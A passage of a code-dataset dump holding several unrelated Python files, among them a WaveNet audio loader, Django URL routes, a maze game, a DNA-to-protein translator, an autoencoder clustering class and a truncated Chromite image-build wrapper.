pygame.event.get():\n if event.type == pygame.QUIT:\n game_exit = True\n draw_main(game_window, my_grid) # draws the game window\n\n print(\"hello world\")\n\n\n# TODO make sure start and end arent blocked\n# TODO convert to our own heap implementation\n# TODO comments on A* algorithm\n# TODO better visualizations\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ttenneb/CS440-Homework1","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":9525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7718246812","text":"\"\"\"\n\"\"\"\nfrom __future__ import division\n\nimport math\nimport os\nimport warnings\n\nimport numpy as np\nimport scipy.io.wavfile\nimport scipy.signal\nfrom picklable_itertools import cycle\nfrom picklable_itertools.extras import partition_all\nfrom tqdm import tqdm\n\n\n# TODO: make SACRED ingredient.\ndef one_hot(x):\n return np.eye(256, dtype='uint8')[x.astype('uint8')]\n\n\ndef fragment_indices(full_sequences, fragment_length, batch_size, fragment_stride, nb_output_bins):\n for seq_i, sequence in enumerate(full_sequences):\n # range_values = np.linspace(np.iinfo(sequence.dtype).min, np.iinfo(sequence.dtype).max, nb_output_bins)\n # digitized = np.digitize(sequence, range_values).astype('uint8')\n for i in range(0, sequence.shape[0] - fragment_length, fragment_stride):\n yield seq_i, i\n\n\ndef select_generator(set_name, random_train_batches, full_sequences, fragment_length, batch_size, fragment_stride,\n nb_output_bins, randomize_batch_order, _rnd):\n if 
random_train_batches and set_name == 'train':\n bg = random_batch_generator\n else:\n bg = batch_generator\n return bg(full_sequences, fragment_length, batch_size, fragment_stride, nb_output_bins, randomize_batch_order, _rnd)\n\n\ndef batch_generator(full_sequences, fragment_length, batch_size, fragment_stride, nb_output_bins, randomize_batch_order, _rnd):\n indices = list(fragment_indices(full_sequences, fragment_length, batch_size, fragment_stride, nb_output_bins))\n if randomize_batch_order:\n _rnd.shuffle(indices)\n\n batches = cycle(partition_all(batch_size, indices))\n for batch in batches:\n if len(batch) < batch_size:\n continue\n yield np.array(\n [one_hot(full_sequences[e[0]][e[1]:e[1] + fragment_length]) for e in batch], dtype='uint8'), np.array(\n [one_hot(full_sequences[e[0]][e[1] + 1:e[1] + fragment_length + 1]) for e in batch], dtype='uint8')\n\n\ndef random_batch_generator(full_sequences, fragment_length, batch_size, fragment_stride, nb_output_bins,\n randomize_batch_order, _rnd):\n lengths = [x.shape[0] for x in full_sequences]\n nb_sequences = len(full_sequences)\n while True:\n sequence_indices = _rnd.randint(0, nb_sequences, batch_size)\n batch_inputs = []\n batch_outputs = []\n for i, seq_i in enumerate(sequence_indices):\n l = lengths[seq_i]\n offset = np.squeeze(_rnd.randint(0, l - fragment_length, 1))\n batch_inputs.append(full_sequences[seq_i][offset:offset + fragment_length])\n batch_outputs.append(full_sequences[seq_i][offset + 1:offset + fragment_length + 1])\n yield one_hot(np.array(batch_inputs, dtype='uint8')), one_hot(np.array(batch_outputs, dtype='uint8'))\n\n\ndef generators(dirname, desired_sample_rate, fragment_length, batch_size, fragment_stride, nb_output_bins,\n learn_all_outputs, use_ulaw, randomize_batch_order, _rnd, random_train_batches):\n fragment_generators = {}\n nb_examples = {}\n for set_name in ['train', 'test']:\n set_dirname = os.path.join(dirname, set_name)\n full_sequences = load_set(desired_sample_rate, set_dirname, use_ulaw)\n fragment_generators[set_name] = select_generator(set_name, random_train_batches, full_sequences,\n fragment_length,\n batch_size, fragment_stride, nb_output_bins,\n randomize_batch_order, _rnd)\n nb_examples[set_name] = int(sum(\n [len(range(0, x.shape[0] - fragment_length, fragment_stride)) for x in\n full_sequences]) / batch_size) * batch_size\n\n return fragment_generators, nb_examples\n\n\ndef generators_vctk(dirname, desired_sample_rate, fragment_length, batch_size, fragment_stride, nb_output_bins,\n learn_all_outputs, use_ulaw, test_factor, randomize_batch_order, _rnd, random_train_batches):\n fragment_generators = {}\n nb_examples = {}\n speaker_dirs = os.listdir(dirname)\n train_full_sequences = []\n test_full_sequences = []\n for speaker_dir in speaker_dirs:\n full_sequences = load_set(desired_sample_rate, os.path.join(dirname, speaker_dir), use_ulaw)\n nb_examples_train = int(math.ceil(len(full_sequences) * (1 - test_factor)))\n train_full_sequences.extend(full_sequences[0:nb_examples_train])\n test_full_sequences.extend(full_sequences[nb_examples_train:])\n\n for set_name, set_sequences in zip(['train', 'test'], [train_full_sequences, test_full_sequences]):\n fragment_generators[set_name] = select_generator(set_name, random_train_batches, full_sequences,\n fragment_length,\n batch_size, fragment_stride, nb_output_bins,\n randomize_batch_order, _rnd)\n nb_examples[set_name] = int(sum(\n [len(range(0, x.shape[0] - fragment_length, fragment_stride)) for x in\n full_sequences]) / batch_size) * 
batch_size\n\n    return fragment_generators, nb_examples\n\n\ndef load_set(desired_sample_rate, set_dirname, use_ulaw):\n    ulaw_str = '_ulaw' if use_ulaw else ''\n    cache_fn = os.path.join(set_dirname, 'processed_%d%s.npy' % (desired_sample_rate, ulaw_str))\n    if os.path.isfile(cache_fn):\n        full_sequences = np.load(cache_fn)\n    else:\n        file_names = [fn for fn in os.listdir(set_dirname) if fn.endswith('.wav')]\n        full_sequences = []\n        for fn in tqdm(file_names):\n            sequence = process_wav(desired_sample_rate, os.path.join(set_dirname, fn), use_ulaw)\n            full_sequences.append(sequence)\n        np.save(cache_fn, full_sequences)\n\n    return full_sequences\n\n\ndef process_wav(desired_sample_rate, filename, use_ulaw):\n    with warnings.catch_warnings():\n        warnings.simplefilter(\"error\")\n        channels = scipy.io.wavfile.read(filename)\n        file_sample_rate, audio = channels\n        audio = ensure_mono(audio)\n        audio = wav_to_float(audio)\n        if use_ulaw:\n            audio = ulaw(audio)\n        audio = ensure_sample_rate(desired_sample_rate, file_sample_rate, audio)\n        audio = float_to_uint8(audio)\n    return audio\n\n\ndef ulaw(x, u=255):\n    x = np.sign(x) * (np.log(1 + u * np.abs(x)) / np.log(1 + u))\n    return x\n\n\ndef float_to_uint8(x):\n    x += 1.\n    x /= 2.\n    uint8_max_value = np.iinfo('uint8').max\n    x *= uint8_max_value\n    x = x.astype('uint8')\n    return x\n\n\ndef wav_to_float(x):\n    try:\n        max_value = np.iinfo(x.dtype).max\n        min_value = np.iinfo(x.dtype).min\n    except ValueError:  # float dtypes have no iinfo, fall back to finfo\n        max_value = np.finfo(x.dtype).max\n        min_value = np.finfo(x.dtype).min\n    x = x.astype('float64', casting='safe')\n    x -= min_value\n    x /= ((max_value - min_value) / 2.)\n    x -= 1.\n    return x\n\n\ndef ulaw2lin(x, u=255.):\n    max_value = np.iinfo('uint8').max\n    min_value = np.iinfo('uint8').min\n    x = x.astype('float64', casting='safe')\n    x -= min_value\n    x /= ((max_value - min_value) / 2.)\n    x -= 1.\n    x = np.sign(x) * (1 / u) * (((1 + u) ** np.abs(x)) - 1)\n    x = float_to_uint8(x)\n    return x\n\ndef ensure_sample_rate(desired_sample_rate, file_sample_rate, mono_audio):\n    if file_sample_rate != desired_sample_rate:\n        mono_audio = scipy.signal.resample_poly(mono_audio, desired_sample_rate, file_sample_rate)\n    return mono_audio\n\n\ndef ensure_mono(raw_audio):\n    \"\"\"\n    Just use first channel.\n    \"\"\"\n    if raw_audio.ndim == 2:\n        raw_audio = raw_audio[:, 0]\n    return raw_audio\n\n","repo_name":"basveeling/wavenet","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":7669,"program_lang":"python","lang":"en","doc_type":"code","stars":1059,"dataset":"github-code","pt":"77"} +{"seq_id":"4125267613","text":"from django.urls import path\nfrom .views import (\n    home, \n    personList,\n    newPerson,\n    updatePerson,\n    vehicleList,\n    newVehicle,\n    updateVehicle,\n    rotaryMotion,\n    newRotaryMotion,\n    updateRotaryMotion,\n    monthly,\n    newMonthly,\n    updateMonthly,\n    rotaryMonthly,\n    newRotaryMonthly,\n    updateRotaryMonthly,\n    )\n\n\nurlpatterns = [\n    path('', home, name='core_home'),\n    #Person URLs\n    path('person_list/', personList, name='core_persons_list'),\n    path('person_new/', newPerson, name='core_persons_new'),\n    path('person_new//', updatePerson, name='core_persons_update'),\n    #Vehicle URLs\n    path('vehicle_list/', vehicleList, name='core_vehicles_list'),\n    path('vehicle_new/', newVehicle, name='core_vehicles_new'),\n    path('vehicle_update//', updateVehicle, name='core_vehicle_update'),\n    #Rotary Motion URLs\n    path('rotaryMotion_list/', rotaryMotion, name='core_rotaryMotion_list'),\n    path('rotaryMotion_new/', newRotaryMotion, name='core_rotaryMotion_new'),\n    
path('rotaryMotion_update//', updateRotaryMotion, name='core_rotaryMotion_update'),\n #Monthly URLs\n path('monthly_list/', monthly, name='core_monthly_list'),\n path('monthly_new/', newMonthly, name='core_monthly_new'),\n path('monthly_update//', updateMonthly, name='core_monthly_update'),\n #Rotary Monthly URLs\n path('rotaryMonthly_list/', rotaryMonthly, name='core_rotaryMonthly_list'),\n path('rotaryMonthly_new/', newRotaryMonthly, name='core_rotaryMonthly_new'),\n path('rotaryMonthly_update//', updateRotaryMonthly, name='core_rotaryMonthly_update'),\n]\n","repo_name":"thiagomurtinho/djangoParking","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21661132887","text":"class Node:\r\n def __init__(self, info): \r\n self.info = info \r\n self.left = None \r\n self.right = None \r\n self.level = None \r\n\r\n def __str__(self):\r\n return str(self.info) \r\n\r\nclass BinarySearchTree:\r\n def __init__(self): \r\n self.root = None\r\n\r\n def create(self, val): \r\n if self.root == None:\r\n self.root = Node(val)\r\n else:\r\n current = self.root\r\n \r\n while True:\r\n if val < current.info:\r\n if current.left:\r\n current = current.left\r\n else:\r\n current.left = Node(val)\r\n break\r\n elif val > current.info:\r\n if current.right:\r\n current = current.right\r\n else:\r\n current.right = Node(val)\r\n break\r\n else:\r\n break\r\n\r\n\"\"\"\r\nNode is defined as\r\nself.left (the left child of the node)\r\nself.right (the right child of the node)\r\nself.info (the value of the node)\r\n\"\"\"\r\nfrom collections import deque\r\ndef levelOrder(root):\r\n if root is None:\r\n print(\"\")\r\n return\r\n myLevel = \"\"\r\n #breadth first search (i.e. make queue)\r\n queue = deque([root])\r\n while queue:\r\n #remove from queue\r\n node = queue.popleft()\r\n #print\r\n myLevel += node.__str__() + \" \"\r\n \r\n #add its children to queue\r\n if node.left is not None:\r\n queue.append(node.left)\r\n if node.right is not None:\r\n queue.append(node.right)\r\n print(myLevel)\r\n \r\ntree = BinarySearchTree()\r\nt = int(input())\r\n\r\narr = list(map(int, input().split()))\r\n\r\nfor i in range(t):\r\n tree.create(arr[i])\r\n\r\nlevelOrder(tree.root)","repo_name":"chrisrobles/python3-cheatsheet","sub_path":"data structures/breadth.py","file_name":"breadth.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23717683667","text":"#Name: Joshua Correa, Nathan Heidari\n#Date: 02/14/23\n#Brief Description: Welcome to Maze Solver! Do you have what it takes to solve these diffuclt mazes? Give it your best shot!\n\nimport check_input\nimport random\n\ndef read_maze():\n '''This function has no input rather it is a function that reads a maze.txt file. The maze file is selected from the Maze folder and is iterated through adding each row. 
The output for this function is a 2D list containing each row of the maze.'''\n    level = random.randint(1, 5) #picks a random maze to play\n    file = open(f'Mazes/maze{level}.txt') #opens the random maze\n    maze = [] #everything below is appending each row of the maze into a list creating a 2D List\n    for row in file:\n        list = []\n        for item in row:\n            if item != '' and item != '\\n':\n                list.append(item)\n        print(row)\n        maze.append(list)\n    file.close()\n    return maze\n    \ndef find_start(maze):\n    '''This function takes the 2D maze list as an input. The maze is iterated through until it finds the S item which is your starting point. The output is a list with two items: the x and y value for the S.'''\n    loc = [] #this function finds S in the maze 2D list and saves its coordinates\n    for row in maze:\n        for item in row:\n            if (item == 'S'):\n                loc.append(maze.index(row) + 1) #x coordinate\n                loc.append(row.index(item) + 1) #y coordinate\n    return loc\n\ndef display_maze(maze, loc):\n    '''This function uses the maze 2D list and the list with the x and y value for the Start location. The function iterates through each row, makes it a string, and then prints it. The output is the full maze and returns nothing.'''\n    maze[loc[0]][loc[1]] = 'X' #makes an X appear wherever the current loc coord is\n    for row in maze: #prints out the maze line by line\n        line = ''\n        for item in row:\n            line += item\n        print(line)\n    \ndef main():\n    '''This function takes no inputs and is a staging ground for all other functions. The function moves the player and checks the conditions for winning. The function also helps with the mystery maze (but it's a secret, don't tell anyone).'''\n    on = True #turns on the game\n    print('-Maze Solver-')\n    maze = read_maze()\n    loc = find_start(maze)\n    loc[0] -= 1 #accurately displays x and y coords\n    loc[1] -= 1\n    origin_x, origin_y = loc[0], loc[1] #saves starting point\n    while (on == True):\n        if (maze[origin_x][origin_y] != 'S'): #consistently displays the start point\n            maze[origin_x][origin_y] = 'S'\n        display_maze(maze, loc)\n        print('1. Go North')\n        print('2. Go South')\n        print('3. Go East')\n        print('4. Go West')\n        choice = check_input.get_int_range('Enter choice: ', 1, 4) #checks your choice for movement\n        \n        if (choice == 2):\n            if (maze[loc[0] + 1][loc[1]] == '*'): #can't walk through walls position not updated\n                print('You cannot move there.')\n                continue\n            \n            elif (maze[loc[0]+1][loc[1]] == 'F') and (len(maze[0]) == 3): #mysterymaze shenanigans\n                print('You didn\\'t think it would be that easy did you?')\n                file = open('Mazes/mysterymaze.txt')\n                maze = []\n                for row in file:\n                    list = []\n                    for item in row:\n                        if item != '' and item != '\\n':\n                            list.append(item)\n                    maze.append(list)\n                loc = find_start(maze)\n                loc[0] -= 1\n                loc[1] -= 1\n                origin_x, origin_y = loc[0], loc[1]\n            \n            elif (maze[loc[0] + 1][loc[1]] == 'F'): #when the player reaches the end the game ends\n                maze[loc[0]][loc[1]] = ' '\n                loc[0] += 1\n                maze[loc[0]][loc[1]] = 'X'\n                display_maze(maze, loc)\n                print('Congratulations! You solved the maze.')\n                break #turns off the game\n            \n            elif (maze[loc[0] + 1][loc[1]] == '?'): #Secrets you can collect! How Exciting!\n                maze[loc[0]][loc[1]] = ' '\n                loc[0] += 1\n                print('Congrats you found the secret! 
You're so cool!')\n            \n            else: #moves player and makes sure to delete the previous position X\n                maze[loc[0]][loc[1]] = ' '\n                loc[0] += 1\n            \n        elif (choice == 1):\n            if (maze[loc[0] - 1][loc[1]] == '*'):\n                print('You cannot move there.')\n                continue\n            \n            elif (maze[loc[0] - 1][loc[1]] == 'F'):\n                maze[loc[0]][loc[1]] = ' '\n                loc[0] -= 1\n                maze[loc[0]][loc[1]] = 'X'\n                display_maze(maze, loc)\n                print('Congratulations! You solved the maze.')\n                break\n            \n            elif (maze[loc[0] - 1][loc[1]] == '?'):\n                maze[loc[0]][loc[1]] = ' '\n                loc[0] -= 1\n                print('Congrats you found the secret! You're so cool!')\n            \n            else:\n                maze[loc[0]][loc[1]] = ' '\n                loc[0] -= 1\n        \n        elif (choice == 3):\n            if (maze[loc[0]][loc[1] + 1] == '*'):\n                print('You cannot move there.')\n                continue\n            \n            elif (maze[loc[0]][loc[1] + 1] == 'F'):\n                maze[loc[0]][loc[1]] = ' '\n                loc[1] += 1\n                maze[loc[0]][loc[1]] = 'X'\n                display_maze(maze, loc)\n                print('Congratulations! You solved the maze.')\n                break\n            \n            elif (maze[loc[0]][loc[1] + 1] == '?'):\n                maze[loc[0]][loc[1]] = ' '\n                loc[1] += 1\n                print('Congrats you found the secret! You're so cool!')\n            \n            else:\n                maze[loc[0]][loc[1]] = ' '\n                loc[1] += 1\n        \n        elif (choice == 4):\n            if (maze[loc[0]][loc[1] - 1] == '*'):\n                print('You cannot move there.')\n                continue\n            \n            elif (maze[loc[0]][loc[1] - 1] == 'F'):\n                maze[loc[0]][loc[1]] = ' '\n                loc[1] -= 1\n                maze[loc[0]][loc[1]] = 'X'\n                display_maze(maze, loc)\n                print('Congratulations! You solved the maze.')\n                break\n            \n            elif (maze[loc[0]][loc[1] - 1] == '?'):\n                maze[loc[0]][loc[1]] = ' '\n                loc[1] -= 1\n                print('Congrats you found the secret! You're so cool!')\n            \n            else:\n                maze[loc[0]][loc[1]] = ' '\n                loc[1] -= 1\nmain()","repo_name":"jolly-yolk/CECS-277","sub_path":"4 - FileIO/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19964299647","text":"import dash\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom database import transforms\nimport pandas as pd\n\n# load data\ndf_con = transforms.df_con\ndf_rec = transforms.df_rec\ndf_fat = transforms.df_fat\ndf_act = transforms.df_act\n\n# add (All) to show world data\ncountries = ['(All)'] + df_con['Country/Region'].dropna().unique().tolist()\nstates = ['(All)'] + df_con['Province/State'].dropna().unique().tolist()\n\n# create country_buttons to sort country buttons\ncountry_cases = {}\nfor country in countries[1:]:\n    country_cases[country] = df_con[df_con['Country/Region']==country].iloc[:, 4:].sum()[-1]\n\ndff = pd.DataFrame(country_cases.items())\ndff.columns = ['Country/Region', 'Cases']\ndff = dff.sort_values(by=['Cases'], ascending=False)\ncountry_buttons = dff['Country/Region']\n\n# the style arguments for the sidebar. 
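(overflow-y is set to scroll below so the long country list stays scrollable.) 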
We use position:fixed and a fixed width\nSIDEBAR_STYLE = {\n \"position\": \"fixed\",\n \"overflow-y\": \"scroll\", # add scroll bar\n \"top\": \"5rem\",\n \"left\": 0,\n \"bottom\": 0,\n \"width\": \"16rem\",\n \"padding\": \"2rem 1rem\",\n \"background-color\": \"#f8f9fa\",\n 'display':'inline-block',\n}\n\ndef create_country_button(country):\n return html.Div([\n html.Div(id=country+'-name', children = [\n country,\n ], style={\n 'textAlign':'left',\n 'display':'table-cell',\n 'vertical-align': 'middle',\n 'padding': 10,\n }),\n html.Div(\n dff[dff['Country/Region']==country]['Cases']\n , style={\n 'textAlign':'right',\n 'display':'table-cell',\n 'vertical-align': 'middle',\n 'padding': 10,\n }),\n ], style={\n 'display': 'table',\n 'border':'1px solid',\n 'border-radius': '3px',\n 'height': '30px',\n 'width': '100%',\n 'margin-bottom': 10,\n })\n\n\nlayout = html.Div([\n\n html.Div([\n html.Div(id='global-name', children = [\n \"Global\",\n ], style={\n 'textAlign':'left',\n 'display':'table-cell',\n 'vertical-align': 'middle',\n 'padding': 10,\n }),\n html.Div([\n df_con.iloc[:, 4:].sum()[-1]\n ], style={\n 'textAlign':'right',\n 'display':'table-cell',\n 'vertical-align': 'middle',\n 'padding': 10,\n }),\n ], style={\n 'display': 'table',\n 'border':'1px solid',\n 'border-radius': '3px',\n 'height': '45px',\n 'width': '100%',\n }),\n\n html.Hr(),\n\n html.Div(\n [create_country_button(country) for country in country_buttons]\n ),\n\n], style=SIDEBAR_STYLE)\n","repo_name":"joomyung/covid19","sub_path":"layout/sidebar.py","file_name":"sidebar.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4470730860","text":"# population of botswana\nbotswana = 3000000\n# population of reunion\nreunion = 95000\n# the year we are in \nyear = 2022\n\n# while loop will continue until reunion is greater than botswana \nwhile reunion < botswana:\n # botswana is decreasing by 0.96\n botswana = botswana * 0.96\n # reunion is increasing by 1.09\n reunion = reunion * 1.09\n # it is increasing\n year += 1\n\n# hence it will print the year when reunion is greater than botswana\nprint(year)\n\n","repo_name":"Salman-Noor1/game.py","sub_path":"population.py","file_name":"population.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70678135290","text":"#! 
C:\\Users\\joris\\AppData\\Local\\Programs\\Python\\Python38\\python.exe\n\n\ndic_P = {\n    'ATA':'I', 'ATC':'I', 'ATT':'I', 'ATG':'M',\n    'ACA':'T', 'ACC':'T', 'ACG':'T', 'ACT':'T',\n    'AAC':'N', 'AAT':'N', 'AAA':'K', 'AAG':'K',\n    'AGC':'S', 'AGT':'S', 'AGA':'R', 'AGG':'R',\n    'CTA':'L', 'CTC':'L', 'CTG':'L', 'CTT':'L',\n    'CCA':'P', 'CCC':'P', 'CCG':'P', 'CCT':'P',\n    'CAC':'H', 'CAT':'H', 'CAA':'Q', 'CAG':'Q',\n    'CGA':'R', 'CGC':'R', 'CGG':'R', 'CGT':'R',\n    'GTA':'V', 'GTC':'V', 'GTG':'V', 'GTT':'V',\n    'GCA':'A', 'GCC':'A', 'GCG':'A', 'GCT':'A',\n    'GAC':'D', 'GAT':'D', 'GAA':'E', 'GAG':'E',\n    'GGA':'G', 'GGC':'G', 'GGG':'G', 'GGT':'G',\n    'TCA':'S', 'TCC':'S', 'TCG':'S', 'TCT':'S',\n    'TTC':'F', 'TTT':'F', 'TTA':'L', 'TTG':'L',\n    'TAC':'Y', 'TAT':'Y', 'TAA':'_', 'TAG':'_',\n    'TGC':'C', 'TGT':'C', 'TGA':'_', 'TGG':'W'}\n\n# Read file\ndef read_file(filename):\n    filehandle = open(filename)\n    for line in filehandle:\n        if line.startswith('>'):\n            header = line.rstrip()\n            sequence = ''\n        else:\n            sequence += line.rstrip()\n    filehandle.close()\n\n    return sequence, header\n\ndef check_if_nuc(sequence):\n    nuc_sequence = True\n    for char in sequence:\n        if char not in 'ATGC':\n            nuc_sequence = False\n            break\n    return nuc_sequence\n\ndef make_protein(sequence, start_position):\n    protein_str = ''\n    for position in range(start_position, len(sequence), 3):\n        triplet = sequence[position:position+3]\n        if len(triplet) == 3:\n            protein_str += dic_P[triplet]\n    return protein_str\n\ndef write_outputfile(protein_str, outputfilehandle, header):\n    print(header, file = outputfilehandle)\n    for position in range(0, len(protein_str), 70):\n        print(protein_str[position:position+70], file = outputfilehandle)\n    print(' ', file=outputfilehandle)\n\n\ndef main():\n    filename = input('Enter the filenames here, separated by spaces: ')\n    filelist = filename.split()\n\n    outputfilename = input('Enter the name of the output file here: ')\n    outputfilehandle = open(outputfilename, 'w')\n\n    start_position = input(\"Enter the start position of the first codon here: \")\n    start_position = int(start_position) - 1\n\n    for filename in filelist:\n        sequence, header = read_file(filename)\n        nuc_sequence = check_if_nuc(sequence)\n        if nuc_sequence:\n            protein_str = make_protein(sequence, start_position)\n            write_outputfile(protein_str, outputfilehandle, header)\n        else:\n            print('Warning: one or more files contain no nucleotides and have not been written to the output file.')\n    outputfilehandle.close()\n\nmain()\n","repo_name":"einsteinium299/bioinformatics","sub_path":"Year_1_Q1/script5.py","file_name":"script5.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10618723236","text":"#!/usr/bin/env python\nimport numpy as np\nfrom random import sample\nimport pickle\nfrom tqdm.autonotebook import tqdm\n\nimport torch\nfrom torch import nn, from_numpy\nfrom torch.autograd import Variable\n\n\nfrom .autoencoder import Autoencoder\nfrom .utils import kl_divergence, make_P\n\nfrom sklearn.cluster import DBSCAN\n\n\nclass AutoencoderTSNE:\n    def __init__(\n        self,\n        *,\n        gpu=0,\n        model=None,\n        learning_rate=0.001,\n        weight_decay=0.01,\n        lambda_kl=0.05,\n        n_iter=5000,\n        algo_clustering=DBSCAN(eps=0.3, min_samples=7),\n        batch_size=500,\n        nb_batches=10,\n        distance_trajectory=\"euclidean\",\n    ):\n        # for now use the gpu 0 by default\n        # TODO: handle the no gpu available case\n        assert gpu is not None\n        self.gpu = gpu\n        self.model = model\n        self.lr = 
learning_rate\n        self.weight_decay = weight_decay\n        self.lambda_kl = lambda_kl\n        self.algo_clustering = algo_clustering\n        self.n_iter = n_iter\n        self.distance_trajectory = distance_trajectory\n        self.is_trained = False\n        self.reco_err, self.kls = [], []\n        self.batch_size = batch_size\n        self.nb_batches = nb_batches\n        self.X = None\n        self.hash_X = None\n\n    def fit(self, X):\n        h_X = hash(X.tobytes())\n        if h_X != self.hash_X:\n            self.X = X\n            self.hash_X = h_X\n            self.train(X)\n\n        v = Variable(from_numpy(X.astype(np.float32)))\n        lat = self.model.encoder(v.cpu()).detach().numpy()\n        self.labels_ = self.algo_clustering.fit_predict(lat)\n\n    def to_pickle(self, filename):\n        \"\"\"Save the current AutoencoderTSNE in a pickle file named 'filename'\n        \"\"\"\n        with open(filename, \"wb\") as f:\n            pickle.dump(self, f)\n\n    @classmethod\n    def from_file(cls, filename):\n        \"\"\"Load a file from pickle\n        \"\"\"\n        with open(filename, \"rb\") as f:\n            return pickle.load(f)\n\n    def score_samples(self, X):\n        \"\"\"Returns a numpy array containing the reconstruction error associated with each flight\n        \"\"\"\n        v = Variable(from_numpy(X.astype(np.float32)))\n        output = self.model(v)\n        return nn.MSELoss(reduction=\"none\")(output, v).sum(1).detach().numpy()\n\n    def train(self, X):\n        dim_input = X.shape[1]\n        # if network's architecture not specified, use (n, n/2, 2)\n        if self.model is None:\n            self.model = Autoencoder((dim_input, dim_input // 2, 2))\n\n        self.model.cuda(self.gpu)\n        # dirty hack\n        model_dim_input = next(self.model.parameters()).size()[1]\n        assert model_dim_input == dim_input\n        optimizer = torch.optim.Adam(\n            self.model.parameters(), lr=self.lr, weight_decay=self.weight_decay\n        )\n        criterion = nn.MSELoss()\n\n        for _ in tqdm(range(self.nb_batches)):\n            idx = np.random.randint(len(X), size=self.batch_size)\n            batch = X[idx, :]\n            P = (\n                torch.tensor(make_P(batch, metric=self.distance_trajectory))\n                .float()\n                .cuda(self.gpu)\n            )\n\n            v = Variable(from_numpy(batch.astype(np.float32))).cuda(self.gpu)\n            for epoch in range(self.n_iter):\n\n                lat = self.model.encoder(v)\n                output = self.model.decoder(lat)\n\n                dist = criterion(output, v)\n                kl = kl_divergence(lat, P, self.gpu)\n                loss = dist + self.lambda_kl * kl\n\n                optimizer.zero_grad()\n                loss.backward()\n                optimizer.step()\n\n                self.reco_err.append(dist.item())\n                self.kls.append(kl.item())\n\n        # disable gpu after training\n        self.model.cpu()\n        self.is_trained = True\n","repo_name":"ViryBe/artefact","sub_path":"artefact/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"37368540471","text":"from __future__ import print_function\n\nimport os\n\nfrom chromite.lib import constants\nfrom chromite.lib import cros_build_lib\nfrom chromite.lib import image_lib\nfrom chromite.lib import osutils\nfrom chromite.lib import path_util\nfrom chromite.lib import portage_util\n\n\nPARALLEL_EMERGE_STATUS_FILE_NAME = 'status_file'\n\n\nclass Error(Exception):\n  \"\"\"Base module error.\"\"\"\n\nclass InvalidArgumentError(Exception):\n  \"\"\"Invalid argument values.\"\"\"\n\n\nclass BuildConfig(object):\n  \"\"\"Value object to hold the build configuration options.\"\"\"\n\n  def __init__(self, builder_path=None, disk_layout=None,\n               enable_rootfs_verification=True, replace=False, version=None):\n    \"\"\"Build config initialization.\n\n    Args:\n      builder_path (str): The value to which the builder path lsb key should be\n        set, the build_name installed on 
DUT during hwtest.\n disk_layout (str): The disk layout type.\n enable_rootfs_verification (bool): Whether the rootfs verification is\n enabled.\n replace (bool): Whether to replace existing output if any exists.\n version (str): The version string to use for the image.\n \"\"\"\n self.builder_path = builder_path\n self.disk_layout = disk_layout\n self.enable_rootfs_verification = enable_rootfs_verification\n self.replace = replace\n self.version = version\n\n def GetArguments(self):\n \"\"\"Get the build_image arguments for the configuration.\"\"\"\n args = []\n\n if self.builder_path:\n args.extend(['--builder_path', self.builder_path])\n if self.disk_layout:\n args.extend(['--disk_layout', self.disk_layout])\n if not self.enable_rootfs_verification:\n args.append('--noenable_rootfs_verification')\n if self.replace:\n args.append('--replace')\n if self.version:\n args.extend(['--version', self.version])\n\n return args\n\n\nclass BuildResult(object):\n \"\"\"Value object to report build image results.\"\"\"\n\n def __init__(self, return_code, failed_packages):\n \"\"\"Init method.\n\n Args:\n return_code (int): The build return code.\n failed_packages (list[str]): A list of failed packages as strings.\n \"\"\"\n self.failed_packages = []\n for package in failed_packages or []:\n self.failed_packages.append(portage_util.SplitCPV(package, strict=False))\n\n # The return code should always be non-zero if there's any failed packages,\n # but it's cheap insurance, so check it.\n self.success = return_code == 0 and not self.failed_packages\n\n\ndef Build(board=None, images=None, config=None):\n \"\"\"Build an image.\n\n Args:\n board (str): The board name.\n images (list): The image types to build.\n config (BuildConfig): The build configuration options.\n\n Returns:\n BuildResult\n \"\"\"\n board = board or cros_build_lib.GetDefaultBoard()\n if not board:\n raise InvalidArgumentError('board is required.')\n images = images or [constants.IMAGE_TYPE_BASE]\n config = config or BuildConfig()\n\n if cros_build_lib.IsInsideChroot():\n cmd = [os.path.join(constants.CROSUTILS_DIR, 'build_image')]\n else:\n cmd = ['./build_image']\n\n cmd.extend(['--board', board])\n cmd.extend(config.GetArguments())\n cmd.extend(images)\n\n with osutils.TempDir() as tempdir:\n status_file = os.path.join(tempdir, PARALLEL_EMERGE_STATUS_FILE_NAME)\n extra_env = {constants.PARALLEL_EMERGE_STATUS_FILE_ENVVAR: status_file}\n result = cros_build_lib.RunCommand(cmd, enter_chroot=True,\n error_code_ok=True, extra_env=extra_env)\n\n try:\n content = osutils.ReadFile(status_file).strip()\n except IOError:\n # No file means no packages.\n failed = None\n else:\n failed = content.split() if content else None\n\n return BuildResult(result.returncode, failed)\n\n\ndef Test(board, result_directory, image_dir=None):\n \"\"\"Run tests on an already built image.\n\n Currently this is just running test_image.\n\n Args:\n board (str): The board name.\n result_directory (str): Root directory where the results should be stored\n relative to the chroot.\n image_dir (str): The path to the image. 
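May be an outside-chroot path; it is converted with path_util.ToChrootPath below. 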
